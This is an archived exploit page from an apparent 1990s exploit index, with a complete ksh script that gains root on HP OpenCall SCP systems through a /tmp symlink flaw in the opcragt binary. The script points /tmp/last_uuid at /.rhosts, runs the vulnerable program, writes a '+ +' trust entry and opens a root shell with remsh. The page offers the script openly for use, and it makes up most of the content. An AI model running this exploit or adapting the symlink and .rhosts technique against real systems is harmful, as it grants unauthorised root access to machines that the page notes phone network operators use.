HP OpenCall SCP /opt/OV/bin/OpC/opcragt exploit

Summary
Description:Standard /tmp symlink vulnerability
Author:Dog Catcher
Compromise: root on a potentially very cool system! (local)
Vulnerable Systems:many phone network operators use OpenCall SCP
Date:October 1996
Notes:See the SOD HP Bug of the Week page
Details

Exploit:

#!/bin/ksh
#
# opchack (C) 1996 Dog Catcher
# if /.rhosts does not exist then this will create one and
# plop a nice little + + inside

rm -f /tmp/last_uuid
ln -s /.rhosts /tmp/last_uuid
/opt/OV/bin/OpC/opcragt `uname -n`

echo '+ +' > /.rhosts

remsh `uname -n` -l root ksh -i

remsh `uname -n` -l root rm -f /.rhosts
rm /tmp/last_uuid



More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault